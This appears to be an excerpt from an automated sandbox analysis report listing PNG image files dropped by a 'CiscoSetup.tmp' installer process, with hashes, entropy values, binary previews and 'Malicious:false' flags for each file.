                                                                                                                                                                                                  Preview:.PNG........IHDR...............M.....pHYs...#...#.x.?v.. .IDATx...x......._...*.<Ih.^.....s.......D....[.....H..*..z).J..j}&...P.B..l..NBD| ' ..r.&3..={...9....Kr^3s.^..^{= ..............M...v.{.l._...e~...H>.4}...w.gpq...>...$..C8k3\.....>.9.. x...g......R..u...~.y..i..F....<.i......b..r.4..j.d..Id..7\Q4Z....H..=.5.....7..A.*X_.~-V.n.8..J.X/...jK..ZX.\.00N.(=p...zA...L}.~......fN.{.L2...e........x.s..t.......-.5..{M.i..#3g........; q..!#{....... }....t....1..N.....1.r.....h..or.".q.8...t..'..&yL..9..M.d....k....c.j.DO...]x5V.6#4SX:..R#n..f...S....sg.7..~5q.`....y.....9...d.o.xL".`..r"..&.3F...B!..B.......).U./...?..... .....7mAZQ.j..z..p$.o.v.=.@\.$.Vh...b.........\.y....:.d.5.9.R>.9.y..q"....4@.*.{.Qi.J.[...........W.6G..4BO..E8j..a.t. ...............o..%...w.+Rqb..PFGkt..)..z.c.B..+;+.7L......V......0.....*:.[.@.E. ...W ....Go8..U.<&..G!8A.@.hY...4Ifj...Z8..+.U.'..F.ea..-Y.Q.,.w.......dA$".>F.Z.VP[.h].B.R..NU...:P....z...<....G.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12124
                                                                                                                                                                                                  Entropy (8bit):7.978101118980993
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:6QcIfCBldrUhS+mzFAXOk03y4nRFoVKX22ZSsnVqzY5oarRl75w1/i5IxehvNbim:6QcRBld2S+m5AOTRaI22ZSgVq053t5ww
                                                                                                                                                                                                  MD5:5B846635AC3DA9C8E857C042ED0EA2F6
                                                                                                                                                                                                  SHA1:B439FC64436B74900F453ED2480C8CA547CBCDCC
                                                                                                                                                                                                  SHA-256:9C6135A6176AC9D00E1BD4307A3111BBECD39814DB18212DA1D55916A4EEDB4F
                                                                                                                                                                                                  SHA-512:0A58ED5105CFB87DD3F91675734171989C0A36B572BA2D20706CC831E0DAD9DB37175754E405680B4DEE4D6D958DA63B89413E2B6D2725A84C95932F8D123323
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............M.....pHYs...#...#.x.?v.. .IDATx...|....O..ZY.Z..!XT* ..,.%...n.R...R.,..)....Vy+..[+..DmA.l).&i.Xi!.XwB.....c....o.;...;..<.L2....<.l..{.9..s(.d..#3;....5...}....]#i.On.....F..G,O&}.]..m.l..rN.k.Jm}Me[...n........Lwe:...f.}`.k7]8......D........v.'(....t.E...^.v......n.....HO";.{.l.2...DX.6._.../.'.=.'9.#....9=... .z....-.>p..~..G......:H..=v...SV.....>..K...w....PYI.....G.mx+2;]az...|...>{...............m.j.*..'x.........n......q..T.9.ew........j'...W..D....-......6)....N2k.,z...+......0..z.x.......z.&./..?..;.0;..+....7Zg.w...B.Y*..qD.....9..G.......9~........S...O..._TTT...Qy\[.(..#c.k*......<..]k.^.c.Lv".5H... e...D./N'.E..tJ....TO.L?A......'..n...*/.....).vwA.bgRS..m.....+.m]~P'8.m.......p.t..a.=....Y.I...$..nO..$....~......m.7..........P.$g.......#.a.>c......;...Y...\.|7.]...S.z..C....=..c.f.2{\..g.h8..v@(....4.....e..fj..Q..{.E.'..../j?|.v..]s...R.......:..;.t.8....'.....x5..#...C..djj..U...8...
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8594
                                                                                                                                                                                                  Entropy (8bit):7.973082494080156
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:IhgOYUbtU91yZQm0IZ5GE1njVNMooVREvukNGEsuiaoYOyF40:IhaUpU91ScIZ5PjVNaREvpjiao4+0
                                                                                                                                                                                                  MD5:D1F876BC1C789A4108570185251B864E
                                                                                                                                                                                                  SHA1:9F91D3B837191A9499CD2959EC1802CF444D78AE
                                                                                                                                                                                                  SHA-256:DF137D0086B1A5DC1A0508643AB8DBE66A0A268A2A5E7A539EDF39F6957AF1AB
                                                                                                                                                                                                  SHA-512:4E1D5AE2D6539B38EDEFEC017B41DD50D7EA41AEF9B6783538D8D19D9C14E2D9411D2DF86AC672BD6B171A507F77EF2D4976003206DC4624687BA4588BAA6688
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............._......pHYs...#...#.x.?v.. .IDATx....U..G!o.<.........Mi@...t+iV@[H.X..-MZ...6E.lZ...X.>%jW..&..]-P.JV.<..Z...Rt..@M.mM7...9sg..;s.{....s.3....o~.H...w.......-...-.<.......4.5.y..d'....7......b..{.....]7..?u......}5y...M.k...`..U.w.............>.}...h..s.... ....Gu!....[tc ;....F...v...k.{.x.'U..;..-..'...B.Y....I...R..0Zw...`u.C...|].....m...y...V.I..?.L.;.8.....Ez&\h.'y.........;...-...G.y/9*....}...S.@..+._..*..a.9WZ...._W+-.B.>.m..:....o..*\...<Mu`.a.........o..w.]@=/_|9Y..~....b...>.dk..4VY...5...v+r"...qw....sm..&.]."y.x..I...kt!fw..Xx.....\.,}.=.gH..AgA..xV.\t..".0.(...8a\.QJ..k..Hu.*.........E..l/...4=x.54l..$j.k3M.../.l|r.=...K.Rt.Z..........N....v...z..S...1^..u...P..j.BF.W...iH.....n).....=.s8...!bx.N<.\]....,.6..`..b~8...[..X..o..R.X.`!BiZ.0...t.im..o....n...s...|W..<....K.by..o..l......{.KMe.....g.n5..b+w.B.Ilo...M?.V:X...!..&.KJ...?...Lj......._.~...l.}...=..HO.@?!d_.O.Vy.....QI=..b4...8t
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4117
                                                                                                                                                                                                  Entropy (8bit):7.943813748161345
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:79m160UrZetyDZrcRzRB+6nB49EkDPzkWb9PhkqjhqBx1DNo:79G6xr6yVrkzRB+UkEWb9pji1DNo
                                                                                                                                                                                                  MD5:04127248AAA5B7D32DC2DE4F02DA025F
                                                                                                                                                                                                  SHA1:6509E437F6503A9975953B955054D29ACE439D5F
                                                                                                                                                                                                  SHA-256:946B8C23BF05558B52D273502A65731A5E412C9E02A544748C5E5C27A3ED6D0D
                                                                                                                                                                                                  SHA-512:F26907895DAAEEE025FB20BCD22803F1151A5D5037B85FF1DCD71DA98E78C417996C08759F646D8E463FB6DD43A36F10092746D6520F9C70BE4AC03AF3B5F48A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...0...0.....W.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..Z.l..u~s........)..(.,KQd.Ih...D5.q..(..@."6..E[.P...r.F..5..H..@Z'h....(:...P4.S..]..=..{..R.D.....@.;...w|.{..............@.DW.8........`.@/.!.N....o..r..D.\..]..? .";U_U...R../q.b.e.e..%-S..J..._1.....0...P(.....!........U.......kg.6...-....^.m...8.....E..3E.r}...._..fg&..............f1.....B.u\.g....zz.w...NWoc.... ...m.....9Z.'.....l..a.L..?.KX?>?V.:84X.../..7...._....#..zT.~.{wu..B......VI.l...e..F^.l...Hy...1..4...[.p......S....j./.t.0..c..O..Z6wGiw'..h........8..`w.g.5.Q..&*.Gxd...@3,..z...8.T...,..VAP$(.tm... .. ......*....\.`.Q.hQ.I\v.].....N..............}...@...%...........x.x.DU.e$..*m.5%..(.A".X.d@r...d.l....:.B..Q..U.H.5....X...k.'...p.>.ZCWo..{...j.2...[....Fg...0.\T...4d.'....%H.....@.k-...4!.+..B..Obr.=948..BgK5?..;Sv`.....)\d........u..}.pw..G.s.TV..R.<.7S......0}.......h.9..*.NG... W4..<*.!..>.U....;c.>..Z.sR..<w......I.....G:.>..#"...%...
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4267
                                                                                                                                                                                                  Entropy (8bit):7.94257084168463
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:IqGbLvTlphRGJSqAeFg590km/kqzrxsoCeaV6XjNfUmhPRD3el9:ILhKFZa0PCPiNfU2RCL
                                                                                                                                                                                                  MD5:7014A8C17D7E8E5A2BEDB4C4E0C12E80
                                                                                                                                                                                                  SHA1:28881EE38814E155FA7B1E0096801A644CAB6548
                                                                                                                                                                                                  SHA-256:BD9514FA182DE90450B6E6E3EEDB2E084CD1390D5B6FDF0509B81EC36B963147
                                                                                                                                                                                                  SHA-512:B2B94E806A4F1F8BACAA2870944C75952A9C9F0577AF6571BFF65038DCD242AF5B887E400430E8E8B0B8E8BD2BA7A7318247581304C668662A7A6A255F142A12
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...0...0.....W.......tEXtSoftware.Adobe ImageReadyq.e<...MIDATx..Zyl..u.s......x..$J.i).l.......6..8.k.h`....(Z.UZ.Q.-....4n...l...6r.@r.#J.K.M..O.7w.......{..R.E.....@.vvw...{..~..~....u7.).......Np..r..K.(f..%!.LB1k....p.......E..l.........x.."{$.Wl..hY.lAO.R..B*>d....c...D?.........*.......=...[....N....;.|..d.T.&..q..."....I...pi8...?...6...s.R.....z.......U5.pM{.j..C..k..wW.....W.e..X.....9"...Q.@.y.G.,.x<....Y...]....\.wn.........YsI..+.....m.?.o..^...`@:]...w#.sv....x....@..0As....!...j.^.q.~..G..z~x....q.....J..a......6=td.=.M..Z.k*..,.#......i.......xP......S.A. o.y.`A*.C.i%..5~......_.Y.?/.%.=z..dr...N..X.lz.....|......x.s6.d.". ........l....@Te.C.)..E..@..%.$..e.&..r..g...9.]k}.t..R...%..6..{............G^.o....F.!.F..Ar*`.<....L...&......S..y|..,$.Yp......A.X.t..N..q.....d.p0.A[S....m...2.g..nr...U...../.vu.........Z".Cl6.....Dt...s2.....l.`.(Z.x.2h...3.f....M.<.F.H)......q.H..p...n.M.......T..._..v?..5(x....
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4052
                                                                                                                                                                                                  Entropy (8bit):7.943954771539964
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:YVzyamWl9ZWA1xj7kdJwie8o1NqPw1AT2Z1OHXe:q5t9ZWmlsy9qPw1AT2Z2e
                                                                                                                                                                                                  MD5:0356D0A27BC2E9B55F5603D0373CED4C
                                                                                                                                                                                                  SHA1:7572FB4DC3B1CEF66F38F68A29093D3FBE706A5E
                                                                                                                                                                                                  SHA-256:E5427AAA99BFC3CC3886351EC9B7C4C524799CF4A0DE0E0CF6D8DE3C0DFB8743
                                                                                                                                                                                                  SHA-512:6BB3E1168712BCAE7F5B67F92A60B58B74162A01225AE264B0A72CDC2CE0C3943A7E9AE47406AFBAE44C25870A877C5EE83142C40EE4BFA6C57DEC495B1C53BE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...0...0.....W.......tEXtSoftware.Adobe ImageReadyq.e<...vIDATx..Y.o\.u?w.3sg..E..H..D-..YV.8n. J..H.......>...C...@..M..o...H..)...]4F....%...Lq.9.>w..|3#.L...h...K....9..;.|C...%}..)a...8..8IJ.H.;o.6.W'.Y.F.L^...a@(....K.)53....3...P,.2.=.I...6....]iV.v....r.....~yk..ej6..]...._8M..R.g.......f.[.......e,.,..i.I.D-.j..J.n....r...U.\[./....U6.$o^..ZE..7@J..I....5>.[g.:..gfBs.qy0....A..........HU%RdY..t=.,6....../5..;.\.....+/x..O...h'...1...8w~..o^=......v.Vk....wc.KA.:..."....D....)..R.e......}..{..w^.....Kd..}.]?7..lJ....O<..o^..../_>.d-.<.i....`{>.O>.w`./.dF.Rt...I..Q..{[0..J..h....T....RB...;.........]o...H...s.._.......L./O.P.....WT.P.A.....@..%RM....6@{....R5....5....M.....~....I...1s.K}.$..H.}./o.=...:..th...9=w.....(.R'-l......Lx. ..iP.iCu:.`.....\nP8.".......VoS8bR.......:..-....7..L).......M.j.rlv.......~..A9..ux.T.)_.S$.....6..<g..{..7..0...+...&h.f..%..\x^.h....1....(.....u):.S.N....Z....i....?.L_..+..%...]x..o...
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 375 x 23, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):700
                                                                                                                                                                                                  Entropy (8bit):6.305816801627044
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/7B0J+UJbp92cDPuY1qHlnv/pebLaeb9Lf43DQ6TjpuIXG13DQ6i5t2c:0erLYWuqylnv/pe3aO9KDUIXO3D+/
                                                                                                                                                                                                  MD5:894AB8F4298F2238292E31BAB5CCAB10
                                                                                                                                                                                                  SHA1:FCFC29B4E5BAC3C59EDA1F8837087E768F7B0A7B
                                                                                                                                                                                                  SHA-256:7C8B5EC8C7DE5405AAEE5B1E92C605020424AED8AF830C2429ED47883561A39D
                                                                                                                                                                                                  SHA-512:B7F06E961C2C2BAC0EFC5633E213D90E3206093593988BD04CE84DA13B1D1B4F0B83DEB77FF247E6681A645004FD37C2866FF83EB7A6A5E3E581B0868AB58C3E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...w..........C......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<...YiTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 5.4.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:tiff="http://ns.adobe.com/tiff/1.0/">. <tiff:Orientation>1</tiff:Orientation>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>.L.'Y....IDATx...... ..A.............. @.@J...C...._..+.......=.T... `.u....A...|.H...0.:@.....q.>U$....w. @.@P....*........ @ (`.O......]... ..0....D.............SE"@..q........{.". @..........=.T... `.u....A...|.H...0.:@............X~....IEND.B`.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2106
                                                                                                                                                                                                  Entropy (8bit):7.848629133083243
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:gySVFiuSZgKTkBsSS/Z89Vn1MM1DCINukyd5Wb:gySBSZCqBhen1MM1CINgsb
                                                                                                                                                                                                  MD5:85D427479A5F8E6F69DEB0A5EC7E6DBF
                                                                                                                                                                                                  SHA1:95414451D6AE9B130831A1C297151F65AD849A6C
                                                                                                                                                                                                  SHA-256:CF8B60054D290DFA6BA59086BF18F5ED0718C721B4ADD200AC95275E5457AB58
                                                                                                                                                                                                  SHA-512:58248F232F27441ACB81B0A6AF2272D19EE1710101C3675CCAEA4BA3CE8A74D664053C58EF2D9C948F2ABCCA4F30B5ACF633A2EA53C8E260BB40FA6F1214151C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v....IDATx..]+s#G..K..N0P..Nf)..0... ..v......l...P*.{(.2R.Yf...*,a.U.d....3.....g.,..~N..$$$$$$$$$$$$$$$$$H..^.b6h.@W}.?.V?oc..O.....x^_...lR.A.......=[,.zX}..S.^..y...8!.@..4...i.5..l...sEHl..p........D.HA2..K.)....:...l.Ud.k.........:........p..Re.J...U.Y..9(.>...%....a..e..V........D.:J.eL..GJ6.P.....3B.kG...wgCP).?.5qH....85|.tel.q..W..=..[.u.....w.3r..k.....RR.B....$....]*.}../.@.71.s0b.bNH4=m.l.^I..`.".. 2...X...^......U..s.!d........~..;..J.f..,)..T..V3+.g%.T.G.b..K.r..=.GF...GT5.s..N.l..:.$..,!.T.......r$>.H..1...Q..}.~&..z.:.iF.}@b..mP.....!B...e..R...A(....U.#..o5&a.43..."]".._..m.......7.G..w.5q&..V.............,.+)\.;.0zw.Th....;.!..^J..-...:L.L.iM..g..Zgq.N8.qhYd.?.7...=t.iL[..B........yi..L...q8w..>..x..p.O..VY.u.s....%A.....`...*.n..L.f...6_."..R.D...8..^...>.N.J.1.;.T....-...}~.M..J.:...B..{m.L.m...>.J;.\T.=).xQ..u{...f........!.)y]lck..W^.v.T.ms...%^..,.b..]ZZ...u.^...
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):478
                                                                                                                                                                                                  Entropy (8bit):7.3703130572324955
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/7xE0NSVUvFAccOOfACD09VvVupRqR5/MXMmxHlWX:YY+vFr+cvV8w3MXMm+
                                                                                                                                                                                                  MD5:D3BD002D9E657FC264347FE2FE45EE8D
                                                                                                                                                                                                  SHA1:8EC6528F2E8A07036C5D5F439FA0438C99CE814E
                                                                                                                                                                                                  SHA-256:B17D8F8BC1B971962A798743630816DFEF50526A2692BB458A7B1B6A546D28B0
                                                                                                                                                                                                  SHA-512:3BF535A63BCE729ABD443CA4265147DB46DFF698BC2AA27C7FFE430527F7C4FD921AFFBD6E789BC00EAC4DFFE300E82488A8C4886DC9D629DCA6B5CF905C0624
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR..............w=.....pHYs...........~.....IDATH..U.m.@.}E. #d.n.. ..a....2@.6.p. a..AG...}..A.U..% ..g.g........u..%.w....'(.............%..{...S..p.gc.|...Y......|`I.\aZ..5..d@..>'.z.7.)....b...P.'...y..4.l...+........I!{......*w.eFV...d...H....xZT.c.F.=..*.f/.Q...".......BF7.a......)....|`..m.o..=.f.........%.d.._.........z!..&,6.;KwN@Z.<~1..%...b....L....<...k8.c.'.....+.&.dE...o..7.....ke..M..Ot..N..^..n.~............IEND.B`.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2245
                                                                                                                                                                                                  Entropy (8bit):7.881067272381913
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:RTfEfdH62oMLD03CqIngSp9wZM/vgRzmD0XQ8/CvbJkfG2:RwfYHt6qKmzmD0g8/Cv9kfG2
                                                                                                                                                                                                  MD5:FC4A9201524066297A4C6DD0760D646C
                                                                                                                                                                                                  SHA1:7B6B7710A1B9EEDAC515FEEE90728A405AC07937
                                                                                                                                                                                                  SHA-256:B19294D4FF3378820B91BF8D2DBC53CB9C8BB531A5CA7E0F4C728AC757C0CD29
                                                                                                                                                                                                  SHA-512:2597C04C2740000747731CB3FF55E7C15675D86578CD0FC73A8F04D84CD084142BF0BFAE55DD81B6AFA1CDE2585EEF233B9BBAB1C05655B3099FA1BBFAECD3DD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v...wIDATx..].R#9..w../..2.c.+..'....O.s..X...y......oD.s....g........nukZ.xo.*.,..f>...[..0`.......0.....y.bvh.9q.w.k....}_.cj.....1f....e...._R..}...1g...W.X.,9_L9/.>D..E..qi.3..&....h..C.....)....3.RI.aU.%...U.qd$..Yu..#CK5i..s...<..3K.u...F.r.R....V.c........>..3)j..>uhC.4....v.J.jm..c.L9.......8..WA.....x....j....3..:....>.c...95.|.eL.qI...V0+..'.l|.........0.. .)..V...z;..M";q.c....bv.T.K.....Fr...];bT%[...!.#..a.5..P..]Rx.X....Q.>1.F..=Rx.,L9.........ck,1G...'....#d...X@....w...'g.:.;)..S..vo..A...#..yo..M}A..+!.Q....h'....$<y..N...|..n..!.R......_.Y...1.C'G8)~.D.....H..-Pu......6N.>..0R.j....qP...../.9.]r..........."...<Cv.3r.(.W(.B$......N.....{I.R..Fok.b.-Pq_.$`*q...A.KLu......8.....x..=.?...).t....PyD.0.*m.........n.`/......zd^....I%...4.^.4C..!/w......l.HZ..l...T.>...KgH.5...}..+.6F.i....*.4.6%.....A;8`6q...Z].av....]']v.....W........L.W.R.MK..?%^R..RcL.3._#...G...1.{..0F %.h3....k.B.>r
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):543
                                                                                                                                                                                                  Entropy (8bit):7.547901309478316
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/7CWdT8JNBxFtHpTJKAghnooED91TFxff+Tye5N3Q2+ah7:KT8rBztJYnCjT3+TN5N1B7
                                                                                                                                                                                                  MD5:5D99349B36EE267BD85E3A4E4C8B9D09
                                                                                                                                                                                                  SHA1:AF5F88451BA51F5FBAE5D3D603655138EE78D27F
                                                                                                                                                                                                  SHA-256:84EF9A5D991E3B3E68AD6F7B8F2D9F279769DC9D27BBB205C3AB9B2BC1607ACA
                                                                                                                                                                                                  SHA-512:58C4E4CDD9B7D5C660A40467F504137D1779222AF24DAFFABB495DBD476A65940E93EF7E8EE7F9BF69A4C4F560D6BA5FB4EEC4DE81C77E4383A24D7B0110DA85
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR..............w=.....pHYs...........~.....IDATH...R.1....y...U....kx..p.9..>@....' (d..=\..p..$....z...;s.In.}../..m.+..4..7.~...@e]...Wx.....~G.2.x+.6J.<&^..).Y.S....Tv.<....,.+..`....G>..Q!".5.h.l.}.I<...*S....t..>%r.0w{.1.mE .@.K.6.-........./L'S.7.|.j..]Z.w..<.'.Kk...`..0N..L..7_.(...C........8,.9. \.T.......K...\..0..L....:...!..}.$.(QQ.....T...../.)dzT..5..iu.......N./.....r.>}.&h%...x....o..6W...B.(...z.a...0w.....BYf.%.{.$.y.NUt*.@....F.T....ge.:v.m..t..xp....d......o.>.....0....IEND.B`.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1702
                                                                                                                                                                                                  Entropy (8bit):7.836409910643584
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:MSsuOJ3aklIveNn3uRjOIi4d6R2LA+KdrIF0Nl3BqL7goSlO2Ywdq8XLxTGO:MD35lIvmnsT8gA+GsFvkoSVdxl
                                                                                                                                                                                                  MD5:2A93A2F714FAB48B6CD5BDF1533EEFE2
                                                                                                                                                                                                  SHA1:727D59B41389E63AD6149117E83035CE8DECD59D
                                                                                                                                                                                                  SHA-256:7982204EE803716D70B99C224A4A1F3AA10CA0AC012CF33802A3E305B72AB8AF
                                                                                                                                                                                                  SHA-512:B4F04174C5B0691F65C4304B5EFC23C5533FF72092F15C03EDBBFBA103158C79FD0F890A7509EF84D85CD662AA849525FDAE1BE9D91016214BF5B1262EA735B3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v...XIDATx..=R.X..{w.l8..8#..-...f.'.9...lhs.)...N`q...!...=.I7.zz-F.H..7._.U.3#.^.[..Z..(..(..(..(..l).e}YE9.....U.[qy..W)Ei....GP-*A...=G......b....R\..R.h..}.]W.>T...Pt.j).Vp.,...*..y1c.......jx...W(Zr....xv.|9..%....$g5.Z.'$.r .......7r..b.y.P.....1.(.)V..P-.Q.._)k..1.t.._....W.R.o...O.d.n................Cl....r.E...m..P...6..,.[!],.m...]..Y-v..6.j.p\c.g.2u...-Bs......k{........^V....e.F...N.u..=.Hw..1..&.....y^..i].E.B ..{.}.....n0w......1.ES..m....p.....R.Q._......gF.Gp.#..v..<~.;t.Xr.nx.bs.K.s.c..<.j#Qf.6k....x..{.....}.?;uS..{.y...y....<..9Q.c"..I;....;^N...n% .O....<.V..;......G..+E....h-....M.T-....."V..G[...S..~r...-.L"f%0@.1.Zx....0 .]d1+.Az.~.b...d.......b....Z*.......k.YZ.m.q....WX....0..G.T......]....s,.obV7..D.7h.2r..g..(<J....+..(V..*.y[.!f..Z..>..".I..t....ab.v....M9...)..U.h..M#.....JA/.VP.>......wB.......^1.....d..R..9Orm-.....R.C..%..(...d...J9#6...{TpXJp....j
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):417
                                                                                                                                                                                                  Entropy (8bit):7.261808950496785
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/7ye/67M2KK09AtPNFPQM7vcvei4A62GCv+OQRWqxEz:de/YM2KYBTcKA62VWvE
                                                                                                                                                                                                  MD5:E49813F0A990FD98318710C0F0BFDA21
                                                                                                                                                                                                  SHA1:FD09D47A8BA649393221D5048D3BFF1FFADD3496
                                                                                                                                                                                                  SHA-256:79C957FB0133496B0266E8F5441982D3F1DAB781B90FBC34F59D75968577CD61
                                                                                                                                                                                                  SHA-512:8883387871CBE8B3778F5D95A95700D99B7D4737696051436C06060C645F83E25255A76AA73CD5BA1B03FC5797D8F6B99D1B0E489B5421D26D4E7DBFD358EA65
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR..............w=.....pHYs...........~....SIDATH..U.Q.0.}e.. ...............N@..3I.A.!.../.......r......SXTW.t..3.n..g.....!/k.t..{....=.^.+E.U..KD.@..@..)..sV...7u..[!_+..F.......#.......?$....3.t....;8.D...N.pv.H...Q\r.....T.t..t..F......~....1a3g......Y..L.#.F%..-.(.o...bl.}..=...T.d2.[.x".m..b.V*./........T...(..+.>[F5....7..j..2:....-;.....P.w|j..d.s.........&.cO........IEND.B`.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1856
                                                                                                                                                                                                  Entropy (8bit):7.845521158056495
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:M5K2A2T3d0z5uOpdNSaQfbDS3YsPWaU3SjmUjm42rh:Mg2A9z5Fp1W3otPW5p
                                                                                                                                                                                                  MD5:AFAF04A11862845AFC31D64F7762D28E
                                                                                                                                                                                                  SHA1:C5E99C3DC321086738CB7BCF13EFF55EBDF1D3CF
                                                                                                                                                                                                  SHA-256:6797601AA69F2B489ADAB85A6DA73E78D4E041D24598BC726A3E837D2BE2D75E
                                                                                                                                                                                                  SHA-512:3D463D3EA19E87E8B592974BF4B69F4F6F5DE08975BB04AB0C180AE7CC49C9866E7B40F2D5890E50E7BF0FE2F8830125335FECB7C4FED8F2AF6045F8E66E18B4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
